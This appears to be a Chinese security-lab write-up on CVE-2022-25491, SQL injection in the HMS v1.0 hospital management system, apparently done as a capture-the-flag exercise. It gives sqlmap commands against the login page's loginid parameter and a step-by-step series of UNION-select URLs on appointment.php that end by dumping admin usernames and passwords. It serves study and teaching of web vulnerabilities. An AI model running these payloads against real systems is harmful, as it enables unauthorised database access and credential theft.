【初级】HMS v1.0 SQL注入

CVE-2022-25491

影响版本:HMS v1.0

描述:HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞

攻击思路

注入点(1):

  • 在登陆界面进行抓包
图片[1]-【初级】HMS v1.0 SQL注入-NGC660 安全实验室

  • 注意loginid参数,这是注入点
  • 直接上sqlma跑,这是个POST注入,要先导出到txt里面
  • sqlmap -r 1.txt -p loginid – > -p 指定参数
图片[2]-【初级】HMS v1.0 SQL注入-NGC660 安全实验室
跑出数据库
--dbs
图片[3]-【初级】HMS v1.0 SQL注入-NGC660 安全实验室
跑出表名
-D hms--tables
图片[4]-【初级】HMS v1.0 SQL注入-NGC660 安全实验室
注入点(2):
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,10 %23 -> 10是回显点
图片[5]-【初级】HMS v1.0 SQL注入-NGC660 安全实验室
/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,database() %23 -> 查看当前数据库
图片[6]-【初级】HMS v1.0 SQL注入-NGC660 安全实验室
/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,(select group_concat(table_name) from information_schema.tables where%20table_schema=database()) %23-> 查看所有表
/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,(select group_concat(column_name) from information_schema.columns where%20table_schema=database() and table_name='admin') %23 -> 查看当前数据库所有列
/appointment.php?editid=-1' union select 1,2,3,4,5,6,7,8,9,(select group_concat(username,password) from admin) %23–> 查看admin表中数据


数据表太多,不知道flag在哪
© 版权声明
THE END
喜欢就支持一下吧
点赞8赏点小钱 分享